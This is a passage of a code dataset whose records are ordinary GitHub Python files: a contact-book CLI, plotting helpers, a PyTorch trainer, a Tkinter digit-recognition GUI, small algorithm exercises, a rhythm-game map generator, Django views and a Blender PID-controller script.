target):\n            print(f'{ti_and_war()} No such contacts found.')\n            reminder()\n            return\n        buff = red_contact(name_book, target)\n        if buff == 'stop':\n            return buff\n        elif buff == 'break':\n            print(f'{ti_and_inf()} You cancelled editing the contact')\n            blu.reminder()\n            return\n\n    elif var == 'search':\n        if not read_cont(name_book):\n            print(f'{ti_and_war()} The contact list is empty!')\n            reminder()\n            
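# nothing to search in an empty contact list, so bail out early\n            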
return\n        buff = ser_contact(name_book)\n        if buff == 'stop':\n            return buff\n        elif buff == 'break':\n            print(f'{ti_and_inf()} You cancelled the contact search')\n            blu.reminder()\n            return\n\n    elif var == 'change':\n        return var\n\n    elif var == 'help':\n        contact_com_info()\n\n    elif var == 'convert':\n        if not read_cont(name_book):\n            print(f'{ti_and_war()} The contact list is empty!')\n            reminder()\n            return\n        buff = convert_opt(name_book)\n        if buff == 'stop':\n            return buff\n        elif buff == 'break':\n            print(f'{ti_and_inf()} You cancelled converting the address book')\n            blu.reminder()\n            return\n        reminder()\n\n    elif var == 'book':\n        exists_file_convert()\n        os.system(r\"explorer.exe Convert Books\")\n        reminder()\n\n    else:\n        print(f'{blu.ti_and_war()} No such command found')\n        reminder()\n","repo_name":"ZeQipe/contact_book-v2.0.0","sub_path":"bl_upper.py","file_name":"bl_upper.py","file_ext":"py","file_size_in_byte":10379,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"24595841545","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef load_data(data_path, envs, trajs):\n    dataset = np.load(data_path)\n    assert len(dataset.shape) == 4  # environments, sequences, time steps, dimensions\n    data_selection = dataset[envs, trajs]\n    data = np.concatenate(data_selection, axis=0)  # concatenate all environment sequences\n    assert len(data.shape) == 3\n    return data\n\n\ndef plot_pred_vs_target(predictions, targets):\n    plt.plot(targets[:, 0], targets[:, 2], label='target')\n    plt.scatter(targets[0, 0], targets[0, 2], label='start target')\n    plt.plot(predictions[:, 0], predictions[:, 2], label='predictions')\n    plt.scatter(predictions[0, 0], predictions[0, 2], label='start prediction')\n    plt.legend()\n    plt.show()\n\n\ndef plot_multiple_heads_and_target(outputs, targets):\n    plt.plot(targets[:, 0], targets[:, 2], label='target')\n    plt.scatter(targets[0, 0], targets[0, 2], label='start target')\n    for predictions in outputs:\n        plt.plot(predictions[:, 0], predictions[:, 2], label='predictions')\n        plt.scatter(predictions[0, 0], predictions[0, 2], label='start prediction')\n    plt.legend()\n    plt.show()\n\n\ndef plot_environment(sequences):\n    for idx, sequence in enumerate(sequences):\n        plt.plot(sequence[:, 0], sequence[:, -1], label=str(idx))\n    plt.legend()\n    plt.title('Environment sequences')\n    plt.show()","repo_name":"leonardbereska/multiheadreservoir","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"}
+{"seq_id":"41476500761","text":"import torch as t\nfrom sklearn.metrics import f1_score\nfrom tqdm.autonotebook import tqdm\n#from evaluation import create_evaluation\n#from ignite.metrics import Accuracy\nimport shutil\nfrom model import resnet\nfrom torch import onnx\n\n\nclass Trainer:\n\n    def __init__(self,\n                 model,                       # Model to be trained.\n                 crit,                        # Loss function\n                 optim = None,                # Optimiser\n                 train_dl = None,             # Training data set\n                 val_test_dl = None,          # Validation (or test) data set\n                 cuda = True,                 # Whether to use the GPU\n                 early_stopping_cb = None):   # The stopping criterion.\n        self._model = model\n        self._crit = crit\n        self._optim = optim\n        self._train_dl = train_dl\n        self._val_test_dl = val_test_dl\n        self._cuda = cuda  # honor the constructor flag instead of hard-coding True\n        self._early_stopping_cb = early_stopping_cb\n\n        if self._cuda:\n            self._model = model.cuda()\n            self._crit = crit.cuda()\n\n    def save_checkpoint(self, epoch):\n        #def save_checkpoint(self, epoch, 
filename='checkpoint.pth.tar'):\n        #t.save(epoch,filename)\n        t.save({'state_dict': self._model.state_dict()}, 'checkpoints/checkpoint_{:03d}.ckp'.format(epoch))\n\n    def restore_checkpoint(self, epoch_n):\n        ckp = t.load('checkpoints/checkpoint_{:03d}.ckp'.format(epoch_n), 'cuda' if self._cuda else None)\n        self._model.load_state_dict(ckp['state_dict'])\n\n    def save_onnx(self, fn):\n        m = self._model.cpu()\n        m.eval()\n        x = t.randn(1, 3, 300, 300, requires_grad=True)\n        y = self._model(x)\n        t.onnx.export(m,                 # model being run\n              x,                         # model input (or a tuple for multiple inputs)\n              fn,                        # where to save the model (can be a file or file-like object)\n              export_params=True,        # store the trained parameter weights inside the model file\n              opset_version=10,          # the ONNX version to export the model to\n              do_constant_folding=True,  # whether to execute constant folding for optimization\n              input_names = ['input'],   # the model's input names\n              output_names = ['output'], # the model's output names\n              dynamic_axes={'input' : {0 : 'batch_size'},    # variable length axes\n                            'output' : {0 : 'batch_size'}})\n\n    def train_step(self, x, y):\n        # perform following steps:\n        # -reset the gradients\n        self._optim.zero_grad()\n        # -propagate through the network\n        output = self._model(x)\n        # -calculate the loss\n        loss = self._crit(output, y)\n        # -compute gradient by backward propagation\n        loss.backward()\n        # -update weights\n        self._optim.step()\n        # -return the loss\n        return loss\n\n\n    def val_test_step(self, x, y):\n        # predict\n        # propagate through the network and calculate the loss and predictions\n        predictions = self._model(x)\n        loss = self._crit(predictions, y)\n        # return the loss and the predictions\n        return loss, predictions\n\n    def train_epoch(self):\n        # set training mode\n        self._model.train()\n        # iterate through the training set\n        # transfer the batch to \"cuda()\" -> the gpu if a gpu is given\n        # perform a training step\n        # calculate the average loss for the epoch and return it\n\n        running_loss = 0.0\n        for x, y in self._train_dl:\n            if self._cuda is not False:\n                self._model.cuda()\n                x = x.cuda()\n                y = y.cuda()\n            loss = self.train_step(x, y)\n            running_loss += loss.item()  # detach the scalar so the graph is not kept around\n        return running_loss/len(self._train_dl)\n\n    def val_test(self):\n        # set eval mode\n        self._model.eval()\n        # disable gradient computation for the whole validation pass\n        # (the original bare `t.no_grad()` call was a no-op; it must be used as a context manager)\n        with t.no_grad():\n            # iterate through the validation set\n            # transfer the batch to the gpu if given\n            # perform a validation step\n            # save the predictions and the labels for each batch\n            # calculate the average loss and average metrics of your choice. You might want to calculate these metrics in designated functions\n            # return the loss and print the calculated metrics\n            running_loss = 0.0\n\n            acc_crack = 0\n            acc_inactive = 0\n            for x, y in self._val_test_dl:\n                if self._cuda is not False:\n                    self._model.cuda()\n                    x = x.cuda()\n                    y = y.cuda()\n                loss, predictions = self.val_test_step(x, y)\n                running_loss += float(loss)\n            return running_loss\n\n    def fit(self, epochs=40):\n        assert self._early_stopping_cb is not None or epochs > 0\n        # create a list for the train and validation losses, and create a counter for the epoch\n        train_losses = []\n        val_losses = []\n        epoch_counter = 0\n        while True:\n            # stop by epoch number\n            if epoch_counter == epochs:\n                break\n            # train for an epoch and then calculate the loss and metrics on the validation set\n            train_loss = self.train_epoch()\n            print(epoch_counter)\n            print('train loss:')\n            print(train_loss)\n            val_loss = self.val_test()\n            # append the losses to the respective lists\n            train_losses.append(train_loss)\n            val_losses.append(val_loss)\n            print('val loss:')\n            print(val_loss)\n            # use the save_checkpoint function to save the model for each epoch\n            Trainer.save_checkpoint(self, epoch_counter)\n            #Trainer.save_onnx(self, exp)\n            #self.save_checkpoint({'epoch_counter': epoch_counter + 1,'state_dict': self._model.state_dict()})\n            #self.save_checkpoint(epoch_counter)\n            # check whether early stopping should be performed using the early stopping callback and stop if so\n            if self._early_stopping_cb.step(train_losses):\n                break\n            #print(\"No early stopping\")\n            epoch_counter += 1\n            #print(epoch_counter)\n\n        # return the loss lists for both training and validation\n        return train_losses, val_losses\n    \n    \n    \n    ","repo_name":"Prajnita/Image-Classification-of-Solar-Panels","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"7161852014","text":"\"\"\"Number Recognition Application for testing deep learning models\n\"\"\"\nimport tkinter as tk\nfrom tkinter import ttk\nfrom pathlib import Path\nimport io\nfrom PIL import Image\nfrom number_recognition_tools import predict_number_image\n\nMODELS_FOLDER = Path('trained_models')\nMODELS_PATH = [model for model in MODELS_FOLDER.iterdir()]\n\n\ndef extract_model_name(model_name):\n    \"\"\"Extract model name from its path\"\"\"\n    return (str(model_name).split('\\\\')[1]).split('.')[0]\n\n\nMODELS_NAME = [extract_model_name(model) for model in MODELS_PATH]\nMODELS_DICT = {k: v for (k, v) in zip(MODELS_NAME, MODELS_PATH)}\n\nIMAGE_FOLDER = Path('number_images')\nIMAGE_NAME = Path('drawed_image.png')\nIMAGE_PATH = Path.joinpath(IMAGE_FOLDER, IMAGE_NAME)\n\n\nclass NumberRecognitionInterface:\n    \"\"\" A class for GUI Packaging\"\"\"\n\n    def __init__(self):\n        main_window = tk.Tk(className='dAriush Number Recognition AI')\n        window_size = (1100, 500)\n        main_window.geometry(f\"{window_size[0]}x{window_size[1]}\")\n        main_window.configure(bg='#006266')\n        button_font = (\"Karla\", 12, \"bold\")\n        menu_font = (\"Karla\", 10, 'bold')\n        result_label_font = (\"Karla\", 15, \"bold\")\n        canvas_background_color = 'white'\n        canvas_size = (500, 500)\n        self.drawing_area = tk.Canvas(main_window,\n                                      bg=canvas_background_color,\n                                      height=canvas_size[1],\n                                      width=canvas_size[0])\n\n        self.is_mouse_clicked = False\n        self.drawing_area.bind(\"<Motion>\", self.draw)\n        self.drawing_area.bind(\"<ButtonPress-1>\", self.mouse_clicked_in_canvas)\n        
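# <Motion> fires on every mouse move; draw() only paints while a button press\n        # has set is_mouse_clicked (see the press/release handlers bound here).\n        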
self.drawing_area.bind(\"<ButtonRelease-1>\",\n self.mouse_released_in_canvas)\n self.drawing_area.grid(row=0, column=0, rowspan=3)\n\n clear_button = tk.Button(main_window, text='Clear All',\n command=self.clear_canvas,\n height=1,\n width=50)\n clear_button.configure(font=button_font, bg='#cd84f1', bd=3,\n activebackground='#c56cf0')\n clear_button.grid(row=2, column=1, columnspan=2)\n\n combobox_label = tk.Label(main_window, text='Choose Model: ')\n combobox_label.configure(font=menu_font, bg='#ffcccc')\n combobox_label.grid(row=0, column=1, sticky=tk.E)\n\n self.models_combobox = ttk.Combobox(main_window, width=47, height=5,\n values=MODELS_NAME)\n self.models_combobox.current(0)\n self.models_combobox.configure(font=menu_font)\n self.models_combobox.grid(row=0, column=2)\n\n self.guess_label = tk.Label(main_window, text=\"draw a number!\",\n height=1,\n width=20)\n self.guess_label.configure(font=result_label_font, bg='#fc5c65')\n self.guess_label.grid(row=1, column=2)\n\n guess_button = tk.Button(main_window, text='Guess!!',\n command=self.guess_image,\n height=1,\n width=10)\n guess_button.configure(font=button_font, bg='#2ecc71', bd=3,\n activebackground='#1abc9c')\n guess_button.grid(row=1, column=1, padx=10)\n\n main_window.mainloop()\n\n def draw(self, event):\n \"\"\" canvas updating method\"\"\"\n if self.is_mouse_clicked:\n self.x_end = event.x\n self.y_end = event.y\n event.widget.create_line(self.x_start, self.y_start,\n self.x_end, self.y_end,\n smooth=tk.TRUE, fill=\"black\", width=10)\n\n self.x_start = event.x\n self.y_start = event.y\n\n def mouse_clicked_in_canvas(self, event):\n \"\"\"mouse click method\"\"\"\n self.is_mouse_clicked = True\n self.x_start = event.x\n self.y_start = event.y\n\n def mouse_released_in_canvas(self, event):\n \"\"\"mouse release method\"\"\"\n self.is_mouse_clicked = False\n\n def clear_canvas(self):\n \"\"\"clear canvas method\"\"\"\n self.drawing_area.delete(\"all\")\n\n def save_as_png(self):\n \"\"\"saving method\"\"\"\n print('Saving!')\n post_script = self.drawing_area.postscript(colormode='color')\n img = Image.open(io.BytesIO(post_script.encode('utf-8')))\n img.save(IMAGE_PATH, 'png')\n print('Saved!')\n\n def guess_image(self):\n \"\"\"AI gues method\"\"\"\n self.save_as_png()\n current_model_path = MODELS_DICT[self.models_combobox.get()]\n model_guess = predict_number_image(current_model_path, IMAGE_PATH)\n self.guess_label['text'] = model_guess\n\n\nif __name__ == '__main__':\n NumberRecognitionInterface()\n","repo_name":"dariush-bahrami/Number-Recognition-Application","sub_path":"number_recognition_gui.py","file_name":"number_recognition_gui.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5622800860","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self, value):\n new_node = Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n\n def prepend(self, value):\n new_node = Node(value)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n new_node.next = self.head\n self.head = new_node\n self.length += 1\n\n def binary_to_decimal(self):\n num = 0\n current = self.head\n while current is not None:\n num = num*2+current.value\n current = current.next\n return num\n\n\nll = LinkedList(1)\nll.prepend(1)\nll.prepend(0)\nll.prepend(0)\nll.prepend(1)\n\nresults = 
ll.binary_to_decimal()\nprint(results)\n","repo_name":"bnasare/DSA","sub_path":"LINKED LIST/LeetCode Questions/binary_to_decimal.py","file_name":"binary_to_decimal.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"27344811723","text":"from time import time\n\n\nclass Solution:\n\n    def multiply(self, num1: str, num2: str) -> str:\n        results = []\n        for j in range(len(num2)-1, -1, -1):\n            carry = 0\n            result = 0\n            for i in range(len(num1) - 1, -1, -1):\n                prod = int(num1[i]) * int(num2[j]) + carry\n                carry = prod // 10\n                result += prod%10 * 10**(len(num1)-i-1)\n            result += carry*(10**len(num1))\n            result *= 10**(len(num2)-j-1)\n            results.append(result)\n        return str(sum(results))\n\n\nstart_time = time()\n\n_num1 = \"123\"\n_num2 = \"456\"\n_num1 = \"123\"\n_num2 = \"0\"\n\n# Input: num1 = \"123\", num2 = \"456\"\n# Output: \"56088\"\n\nprint(Solution().multiply(_num1, _num2))\n\nprint(\"--- %s seconds ---\" % (time() - start_time))","repo_name":"Sadomtsevvs/Leetcode","sub_path":"43. Multiply Strings.py","file_name":"43. Multiply Strings.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"17166120660","text":"# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n# Solution 1: recursion; time complexity O(N), space complexity O(N)\nclass Solution:\n    def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n\n        def _build(preorder, inorder):\n            if not preorder: return \n\n            root = TreeNode(preorder[0])\n            index = inorder.index(preorder[0])\n\n            root.left = _build(preorder[1: index + 1], inorder[: index])\n            root.right = _build(preorder[index + 1: ], inorder[index + 1: ])\n            return root\n\n        return _build(preorder, inorder)\n","repo_name":"PangYunsheng8/LeetCode","sub_path":"剑指offer/重建二叉树.py","file_name":"重建二叉树.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"17937268472","text":"from utils import *\r\nfrom bounce import Bounce\r\nfrom particle import Particle\r\nfrom square import Square\r\nfrom time import time as get_current_time\r\nfrom scorekeeper import Scorekeeper\r\nimport random\r\nimport pygame\r\n\r\n\r\nclass World:\r\n    \"\"\"it's a cruel world out there\"\"\"\r\n\r\n    def __init__(self):\r\n        self.future_bounces: list[Bounce] = []\r\n        self.past_bounces: list[Bounce] = []\r\n        self.start_time = 0\r\n        self.time = 0\r\n        self.rectangles: list[pygame.Rect] = []\r\n        self.particles: list[Particle] = []\r\n        self.timestamps = []\r\n        self.square = Square()\r\n        self.scorekeeper = Scorekeeper(self)\r\n\r\n    def update_time(self) -> None:\r\n        self.time = get_current_time() - self.start_time\r\n\r\n    def next_bounce(self) -> Bounce:\r\n        self.past_bounces.append(self.future_bounces.pop(0))\r\n        return self.past_bounces[-1]\r\n\r\n    def add_particles(self, sp: list[float], sd: list[float]):\r\n        for _ in range(Config.particle_amount):\r\n            new = Particle([sp[0]+random.randint(-10, 10), sp[1]+random.randint(-10, 10)], sd)\r\n            self.particles.append(new)\r\n\r\n    def handle_bouncing(self, square: Square):\r\n        if len(self.future_bounces):\r\n            if (self.time * 1000 + Config.music_offset)/1000 > self.future_bounces[0].time:\r\n                current_bounce = self.next_bounce()\r\n                before = square.dir.copy()\r\n                square.obey_bounce(current_bounce)\r\n                changed = 
square.dir.copy()\r\n for _ in range(2):\r\n if before[_] == changed[_]:\r\n changed[_] = 0\r\n else:\r\n changed[_] = -changed[_]\r\n self.add_particles(square.pos, changed)\r\n\r\n # stop square at end\r\n if len(self.future_bounces) == 0:\r\n square.dir = [0, 0]\r\n square.pos = current_bounce.square_pos\r\n\r\n def handle_keypress(self, time_from_start, misses):\r\n return self.scorekeeper.do_keypress(time_from_start, misses)\r\n\r\n def gen_future_bounces(self, _start_notes: list[tuple[int, int, int]], percent_update_callback):\r\n \"\"\"Recursive solution is necessary\"\"\"\r\n total_notes = len(_start_notes)\r\n max_percent = 0\r\n path = []\r\n safe_areas = []\r\n force_return = 0\r\n\r\n def recurs(\r\n square: Square,\r\n notes: list[float],\r\n bounces_so_far: list[Bounce] = None,\r\n prev_index_priority=None,\r\n t: float = 0,\r\n depth: int = 0\r\n ) -> Union[list[Bounce], bool]:\r\n nonlocal force_return, max_percent\r\n if prev_index_priority is None:\r\n prev_index_priority = [0, 1]\r\n if bounces_so_far is None:\r\n bounces_so_far = []\r\n gone_through_percent = (total_notes-len(notes)) * 100 // total_notes\r\n while gone_through_percent > max_percent:\r\n max_percent += 1\r\n if percent_update_callback(f\"{max_percent}% done generating map\"):\r\n raise UserCancelsLoadingError()\r\n\r\n all_bounce_rects = [_bounc.get_collision_rect() for _bounc in bounces_so_far]\r\n if len(notes) == 0:\r\n return bounces_so_far\r\n # print(depth * 100 // total_notes)\r\n path_segment_start = len(path)\r\n start_rect = square.rect.copy()\r\n while True:\r\n t += 1/FRAMERATE\r\n square.reg_move(False)\r\n path.append(square.rect)\r\n if t > notes[0]:\r\n # no collision (we good)\r\n bounce_indexes = prev_index_priority\r\n\r\n # randomly change direction every X% of the time\r\n if random.random() * 100 < Config.direction_change_chance:\r\n bounce_indexes = list(bounce_indexes.__reversed__())\r\n\r\n # add safe area\r\n safe_areas.append(start_rect.union(square.rect))\r\n\r\n for direction_to_bounce in bounce_indexes:\r\n square.dir[direction_to_bounce] *= -1\r\n bounces_so_far.append(Bounce(square.pos, square.dir, t, direction_to_bounce))\r\n\r\n toextend = recurs(\r\n square=square.copy(),\r\n notes=notes[1:],\r\n bounces_so_far=[_b.copy() for _b in bounces_so_far],\r\n t=t,\r\n prev_index_priority=bounce_indexes.copy(),\r\n depth=depth+1\r\n )\r\n\r\n if toextend:\r\n return toextend\r\n else:\r\n bounces_so_far = bounces_so_far[:-1]\r\n square.dir[direction_to_bounce] *= -1\r\n\r\n # instead of trying other path from here, just exit a bit back to try another from previous\r\n if force_return:\r\n force_return -= 1\r\n while len(path) != path_segment_start:\r\n path.pop()\r\n return False\r\n\r\n continue\r\n while len(path) != path_segment_start:\r\n path.pop()\r\n return False\r\n\r\n othercheck = False\r\n if len(bounces_so_far):\r\n othercheck = bounces_so_far[-1].get_collision_rect().collidelist(path[:-10])+1\r\n\r\n if square.rect.collidelist(all_bounce_rects) != -1 or othercheck:\r\n if depth > 200:\r\n if random.random() < Config.backtrack_chance:\r\n max_percent -= (Config.backtrack_amount * 100 // total_notes) + 1\r\n force_return = Config.backtrack_amount\r\n\r\n while len(path) != path_segment_start:\r\n path.pop()\r\n return False\r\n\r\n _start_notes = _start_notes[:Config.max_notes] if Config.max_notes is not None else _start_notes\r\n\r\n self.scorekeeper.unhit_notes = remove_too_close_values([_sn for _sn in _start_notes], Config.bounce_min_spacing)\r\n\r\n 
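# notes closer together than Config.bounce_min_spacing were dropped above, and the\r\n        # same filtered list is what feeds the recursive path search below.\r\n        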
self.future_bounces = recurs(\r\n square=self.square.copy(),\r\n notes=remove_too_close_values(\r\n [_sn for _sn in _start_notes],\r\n threshold=Config.bounce_min_spacing\r\n )\r\n )\r\n\r\n if self.future_bounces is False:\r\n raise MapLoadingFailureError(\"The map failed to generate because of the recursion function. \" +\r\n \"If the midi has too many notes too close, it may not generate. Maybe try changing the square speed?\")\r\n\r\n if len(self.future_bounces) == 0:\r\n raise MapLoadingFailureError(\"Map safearea list empty. Please report to the github under the issues tab\")\r\n\r\n percent_update_callback(\"Removing overlapping safe areas\")\r\n\r\n # eliminate fully overlapping safe areas\r\n safe_areas: list[pygame.Rect]\r\n while True:\r\n new = []\r\n before_safe_count = len(safe_areas)\r\n for safe1 in safe_areas:\r\n for safe2 in safe_areas:\r\n if safe2 == safe1:\r\n continue\r\n if safe2.contains(safe1):\r\n break\r\n else:\r\n new.append(safe1)\r\n safe_areas = new.copy()\r\n after_safe_count = len(safe_areas)\r\n if after_safe_count == before_safe_count:\r\n break\r\n safe_areas = safe_areas\r\n\r\n self.rectangles = [_fb.get_collision_rect() for _fb in self.future_bounces]\r\n return safe_areas\r\n","repo_name":"quasar098/midi-playground","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":8025,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"54"} +{"seq_id":"22719270580","text":"from django.shortcuts import get_object_or_404, render_to_response\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.template import RequestContext\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.template.defaultfilters import slugify\nfrom datetime import *\nfrom pytz import *\nfrom decimal import *\nfrom ursula.models import PostCategory, PostCategoryForm, PostCategoryList\n\nimport urllib\n\n\n# meta functions\n\n\n@login_required\ndef index(request):\n item_list = PostCategory.objects.all().order_by('-title')\n return render_to_response('ursula/postcategories/postcategories-list.html',\n {'item_list': item_list\n }, context_instance=RequestContext(request)\n )\n\n \n@login_required\ndef edit(request, id=\"\"):\n submit_action = ''\n form = PostCategoryForm()\n item = \"\"\n \n if id != \"\":\n item = PostCategory.objects.get(pk=id) \n if request.method == 'POST':\n if request.POST['submit_action'] == 'Add':\n form = PostCategoryForm(request.POST)\n if form.is_valid():\n item = form.save()\n \n return HttpResponseRedirect('/postcategories/') # Redirect after POST\n else:\n submit_action = 'Add'\n if request.POST['submit_action'] == 'Update':\n form = PostCategoryForm(request.POST, instance=item)\n if form.is_valid():\n item = form.save()\n \n return HttpResponseRedirect('/postcategories/')\n else:\n submit_action = 'Update'\n if request.method == 'GET':\n if id:\n submit_action = 'Update'\n item = get_object_or_404(PostCategory, pk=id)\n form = PostCategoryForm(instance=item)\n else:\n submit_action = 'Add'\n \n return render_to_response(\n 'ursula/postcategories/postcategories-edit.html',\n { 'request': request,\n 'form': form,\n 'submit_action': submit_action,\n 'edit_id': id,\n 'item': item,\n }, \n context_instance=RequestContext(request))\n \n \ndef create_ajax(request):\n cat_name = request.POST.get('category_name', '')\n cat_slug = create_slug(cat_name)\n\n cat = PostCategory()\n 
cat.title = cat_name\n cat.slug = cat_slug\n cat.is_active = 1\n cat.save()\n \n return HttpResponse(cat.id)\n \n \n \ndef gen_slug(request):\n return HttpResponse(create_slug(request.GET.get('slug', '')))\n\ndef create_slug(slug):\n new_slug = slugify(slug)\n orig_slug = new_slug\n #check for slug already existing\n counter = 1\n while (PostCategory.objects.all().filter(slug=new_slug).count() > 0):\n new_slug = orig_slug + \"-\" + str(counter)\n counter += 1\n \n return new_slug\n\n\n\n ","repo_name":"stbarrett/dc_test","sub_path":"_lib/ursula/postcategories/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73357341603","text":"import bpy\nimport mathutils\nfrom random import randint, uniform\nfrom math import *\nimport os\nimport json\nfrom mathutils import Vector, Quaternion\nfrom time import sleep \n\n\n\nimport time\nimport warnings\n#from scripts import PID\n\n\nimport time\nimport warnings\n\n\ndef _clamp(value, limits):\n lower, upper = limits\n if value is None:\n return None\n elif upper is not None and value > upper:\n return upper\n elif lower is not None and value < lower:\n return lower\n return value\n\n\ntry:\n # get monotonic time to ensure that time deltas are always positive\n _current_time = time.monotonic\nexcept AttributeError:\n # time.monotonic() not available (using python < 3.3), fallback to time.time()\n _current_time = time.time\n warnings.warn('time.monotonic() not available in python < 3.3, using time.time() as fallback')\n\n\nclass PID(object):\n \"\"\"\n A simple PID controller. No fuss.\n \"\"\"\n\n def __init__(self,\n Kp=1.0, Ki=0.0, Kd=0.0,\n setpoint=0,\n sample_time=0.01,\n output_limits=(None, None),\n auto_mode=True,\n proportional_on_measurement=False):\n \"\"\"\n :param Kp: The value for the proportional gain Kp\n :param Ki: The value for the integral gain Ki\n :param Kd: The value for the derivative gain Kd\n :param setpoint: The initial setpoint that the PID will try to achieve\n :param sample_time: The time in seconds which the controller should wait before generating a new output value.\n The PID works best when it is constantly called (eg. during a loop), but with a sample\n time set so that the time difference between each update is (close to) constant. If set to\n None, the PID will compute a new output value every time it is called.\n :param output_limits: The initial output limits to use, given as an iterable with 2 elements, for example:\n (lower, upper). The output will never go below the lower limit or above the upper limit.\n Either of the limits can also be set to None to have no limit in that direction. Setting\n output limits also avoids integral windup, since the integral term will never be allowed\n to grow outside of the limits.\n :param auto_mode: Whether the controller should be enabled (in auto mode) or not (in manual mode)\n :param proportional_on_measurement: Whether the proportional term should be calculated on the input directly\n rather than on the error (which is the traditional way). 
Using\n proportional-on-measurement avoids overshoot for some types of systems.\n \"\"\"\n self.Kp, self.Ki, self.Kd = Kp, Ki, Kd\n self.setpoint = setpoint\n self.sample_time = sample_time\n\n self._min_output, self._max_output = output_limits\n self._auto_mode = auto_mode\n self.proportional_on_measurement = proportional_on_measurement\n\n self.reset()\n\n def __call__(self, input_, dt=None):\n \"\"\"\n Call the PID controller with *input_* and calculate and return a control output if sample_time seconds has\n passed since the last update. If no new output is calculated, return the previous output instead (or None if\n no value has been calculated yet).\n :param dt: If set, uses this value for timestep instead of real time. This can be used in simulations when\n simulation time is different from real time.\n \"\"\"\n if not self.auto_mode:\n return self._last_output\n\n now = _current_time()\n if dt is None:\n dt = now - self._last_time if now - self._last_time else 1e-16\n elif dt <= 0:\n raise ValueError(\"dt has nonpositive value {}. Must be positive.\".format(dt))\n\n if self.sample_time is not None and dt < self.sample_time and self._last_output is not None:\n # only update every sample_time seconds\n return self._last_output\n\n # compute error terms\n error = self.setpoint - input_\n d_input = input_ - (self._last_input if self._last_input is not None else input_)\n\n # compute the proportional term\n if not self.proportional_on_measurement:\n # regular proportional-on-error, simply set the proportional term\n self._proportional = self.Kp * error\n else:\n # add the proportional error on measurement to error_sum\n self._proportional -= self.Kp * d_input\n\n # compute integral and derivative terms\n self._integral += self.Ki * error * dt\n self._integral = _clamp(self._integral, self.output_limits) # avoid integral windup\n\n self._derivative = -self.Kd * d_input / dt\n\n # compute final output\n output = self._proportional + self._integral + self._derivative\n output = _clamp(output, self.output_limits)\n\n # keep track of state\n self._last_output = output\n self._last_input = input_\n self._last_time = now\n\n return output\n\n @property\n def components(self):\n \"\"\"\n The P-, I- and D-terms from the last computation as separate components as a tuple. 
Useful for visualizing\n what the controller is doing or when tuning hard-to-tune systems.\n \"\"\"\n return self._proportional, self._integral, self._derivative\n\n @property\n def tunings(self):\n \"\"\"The tunings used by the controller as a tuple: (Kp, Ki, Kd)\"\"\"\n return self.Kp, self.Ki, self.Kd\n\n @tunings.setter\n def tunings(self, tunings):\n \"\"\"Setter for the PID tunings\"\"\"\n self.Kp, self.Ki, self.Kd = tunings\n\n @property\n def auto_mode(self):\n \"\"\"Whether the controller is currently enabled (in auto mode) or not\"\"\"\n return self._auto_mode\n\n @auto_mode.setter\n def auto_mode(self, enabled):\n \"\"\"Enable or disable the PID controller\"\"\"\n self.set_auto_mode(enabled)\n\n def set_auto_mode(self, enabled, last_output=None):\n \"\"\"\n Enable or disable the PID controller, optionally setting the last output value.\n This is useful if some system has been manually controlled and if the PID should take over.\n In that case, pass the last output variable (the control variable) and it will be set as the starting\n I-term when the PID is set to auto mode.\n :param enabled: Whether auto mode should be enabled, True or False\n :param last_output: The last output, or the control variable, that the PID should start from\n when going from manual mode to auto mode\n \"\"\"\n if enabled and not self._auto_mode:\n # switching from manual mode to auto, reset\n self.reset()\n\n self._integral = (last_output if last_output is not None else 0)\n self._integral = _clamp(self._integral, self.output_limits)\n\n self._auto_mode = enabled\n\n @property\n def output_limits(self):\n \"\"\"\n The current output limits as a 2-tuple: (lower, upper). See also the *output_limts* parameter in\n :meth:`PID.__init__`.\n \"\"\"\n return self._min_output, self._max_output\n\n @output_limits.setter\n def output_limits(self, limits):\n \"\"\"Setter for the output limits\"\"\"\n if limits is None:\n self._min_output, self._max_output = None, None\n return\n\n min_output, max_output = limits\n\n if None not in limits and max_output < min_output:\n raise ValueError('lower limit must be less than upper limit')\n\n self._min_output = min_output\n self._max_output = max_output\n\n self._integral = _clamp(self._integral, self.output_limits)\n self._last_output = _clamp(self._last_output, self.output_limits)\n\n def reset(self):\n \"\"\"\n Reset the PID controller internals, setting each term to 0 as well as cleaning the integral,\n the last output and the last input (derivative calculation).\n \"\"\"\n self._proportional = 0\n self._integral = 0\n self._derivative = 0\n\n self._last_time = _current_time()\n self._last_output = None\n self._last_input = None\n\n\n\n\n\n\n\ndef update():\n dg = bpy.context.evaluated_depsgraph_get() \n dg.update()\n\nimport numpy as np\n\ndef camera_view_bounds_2d(scene, camera_object, mesh_object):\n \"\"\"\n Returns camera space bounding box of the mesh object.\n Gets the camera frame bounding box, which by 